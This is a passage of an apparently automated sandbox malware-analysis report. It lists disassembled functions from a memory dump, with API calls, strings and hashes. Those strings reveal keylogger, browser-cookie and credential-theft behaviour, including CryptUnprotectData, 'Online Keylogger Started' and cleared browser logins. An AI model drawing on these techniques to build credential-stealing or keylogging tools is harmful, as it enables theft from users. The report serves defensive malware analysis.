                                                        • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
                                                        • Opcode Fuzzy Hash: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
                                                        • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040C6BB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000), ref: 0040C559
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C757
                                                        Strings
                                                        • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                                                        • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExistsFilePath
                                                        • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                        • API String ID: 1174141254-1980882731
                                                        • Opcode ID: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
                                                        • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
                                                        • Opcode Fuzzy Hash: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
                                                        • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040B164 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                                        • wsprintfW.USER32 ref: 0040B1F3
                                                          • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: EventLocalTimewsprintf
                                                        • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                        • API String ID: 1497725170-1359877963
                                                        • Opcode ID: c8cd868dd362bd9616f6924cb695c27546a7cf7ec47136230a452d94a8988757
                                                        • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                                                        • Opcode Fuzzy Hash: c8cd868dd362bd9616f6924cb695c27546a7cf7ec47136230a452d94a8988757
                                                        • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040AEEE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                                          • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040AF6E
                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040AF7A
                                                        • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateThread$LocalTime$wsprintf
                                                        • String ID: Online Keylogger Started
                                                        • API String ID: 112202259-1258561607
                                                        • Opcode ID: 958200284c2bea51d202cfda8ca6d09af1b0fae5d8a7627b3d8146febcef491d
                                                        • Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
                                                        • Opcode Fuzzy Hash: 958200284c2bea51d202cfda8ca6d09af1b0fae5d8a7627b3d8146febcef491d
                                                        • Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00406A63 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(crypt32), ref: 00406A82
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: CryptUnprotectData$crypt32
                                                        • API String ID: 2574300362-2380590389
                                                        • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                                        • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
                                                        • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                                        • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                        • CloseHandle.KERNEL32(?), ref: 004051CA
                                                        • SetEvent.KERNEL32(?), ref: 004051D9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseEventHandleObjectSingleWait
                                                        • String ID: Connection Timeout
                                                        • API String ID: 2055531096-499159329
                                                        • Opcode ID: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
                                                        • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
                                                        • Opcode Fuzzy Hash: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
                                                        • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040E7C5 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Exception@8Throw
                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                        • API String ID: 2005118841-1866435925
                                                        • Opcode ID: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                                                        • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
                                                        • Opcode Fuzzy Hash: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                                                        • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00413814 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041381F
                                                        • RegSetValueExW.ADVAPI32 ref: 0041384D
                                                        • RegCloseKey.ADVAPI32(004752D8), ref: 00413858
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseCreateValue
                                                        • String ID: pth_unenc
                                                        • API String ID: 1818849710-4028850238
                                                        • Opcode ID: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
                                                        • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
                                                        • Opcode Fuzzy Hash: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
                                                        • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040DFA6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                                                          • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                                                          • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                        • String ID: bad locale name
                                                        • API String ID: 3628047217-1405518554
                                                        • Opcode ID: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                                                        • Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
                                                        • Opcode Fuzzy Hash: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                                                        • Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00416C2D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                                                        • ShowWindow.USER32(00000009), ref: 00416C61
                                                        • SetForegroundWindow.USER32 ref: 00416C6D
                                                          • Part of subcall function 0041CD9B: AllocConsole.KERNEL32 ref: 0041CDA4
                                                          • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                                          • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                                        • String ID: !D@
                                                        • API String ID: 3446828153-604454484
                                                        • Opcode ID: b7364eaafb7a437eec89ed9fb4143899ef50b32a2d873a0c8232afd7958e43d5
                                                        • Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
                                                        • Opcode Fuzzy Hash: b7364eaafb7a437eec89ed9fb4143899ef50b32a2d873a0c8232afd7958e43d5
                                                        • Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004160EE Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExecuteShell
                                                        • String ID: /C $cmd.exe$open
                                                        • API String ID: 587946157-3896048727
                                                        • Opcode ID: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
                                                        • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
                                                        • Opcode Fuzzy Hash: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
                                                        • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040B8AC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                                        • UnhookWindowsHookEx.USER32 ref: 0040B8C7
                                                        • TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: TerminateThread$HookUnhookWindows
                                                        • String ID: pth_unenc
                                                        • API String ID: 3123878439-4028850238
                                                        • Opcode ID: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                                                        • Instruction ID: 1c21f009177841ea8acfe7f5b61a435624369701cc7e40c150536a334dec3301
                                                        • Opcode Fuzzy Hash: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                                                        • Instruction Fuzzy Hash: 4AE01272205356EFD7241FA09C988267BEEDA0478A324487EF2C3626B1CA794C10CB5D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                        • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressHandleModuleProc
                                                        • String ID: GetCursorInfo$User32.dll
                                                        • API String ID: 1646373207-2714051624
                                                        • Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                                        • Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
                                                        • Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                                        • Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
                                                        • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetLastInputInfo$User32.dll
                                                        • API String ID: 2574300362-1519888992
                                                        • Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                                        • Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
                                                        • Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                                        • Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0044A004 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: __alldvrm$_strrchr
                                                        • String ID:
                                                        • API String ID: 1036877536-0
                                                        • Opcode ID: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                                        • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                                                        • Opcode Fuzzy Hash: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                                        • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00442801 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                                        • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
                                                        • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                                        • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040C00C Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                                                        • Cleared browsers logins and cookies., xrefs: 0040C0F5
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                        • API String ID: 3472027048-1236744412
                                                        • Opcode ID: f04c9fcfc5d51e830be94f028420677c48269f78a09cd2570410497d2b162b15
                                                        • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
                                                        • Opcode Fuzzy Hash: f04c9fcfc5d51e830be94f028420677c48269f78a09cd2570410497d2b162b15
                                                        • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040A529 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041C551: GetForegroundWindow.USER32 ref: 0041C561
                                                          • Part of subcall function 0041C551: GetWindowTextLengthW.USER32 ref: 0041C56A
                                                          • Part of subcall function 0041C551: GetWindowTextW.USER32 ref: 0041C594
                                                        • Sleep.KERNEL32(000001F4), ref: 0040A573
                                                        • Sleep.KERNEL32(00000064), ref: 0040A5FD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Window$SleepText$ForegroundLength
                                                        • String ID: [ $ ]
                                                        • API String ID: 3309952895-93608704
                                                        • Opcode ID: 31279ddc9ac779b407beafc78fb4a7c612abc736342ec11431a77cc1334fcb89
                                                        • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
                                                        • Opcode Fuzzy Hash: 31279ddc9ac779b407beafc78fb4a7c612abc736342ec11431a77cc1334fcb89
                                                        • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00443A33 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                                                        • Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
                                                        • Opcode Fuzzy Hash: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                                                        • Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00443AB2 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                                        • Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
                                                        • Opcode Fuzzy Hash: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                                        • Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041C485 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C4B2
                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4D7
                                                        • CloseHandle.KERNEL32(00000000), ref: 0041C4E5
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$CloseCreateHandleReadSize
                                                        • String ID:
                                                        • API String ID: 3919263394-0
                                                        • Opcode ID: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
                                                        • Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
                                                        • Opcode Fuzzy Hash: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
                                                        • Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041C1DD Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                        • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                        • CloseHandle.KERNEL32(00000000), ref: 0041C233
                                                        • CloseHandle.KERNEL32(00000000), ref: 0041C23B
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseHandleOpenProcess
                                                        • String ID:
                                                        • API String ID: 39102293-0
                                                        • Opcode ID: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                                                        • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
                                                        • Opcode Fuzzy Hash: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                                                        • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00439863 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                                                          • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                                                        • _UnwindNestedFrames.LIBCMT ref: 00439891
                                                        • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                                                        • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                        • String ID:
                                                        • API String ID: 2633735394-0
                                                        • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                        • Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
                                                        • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
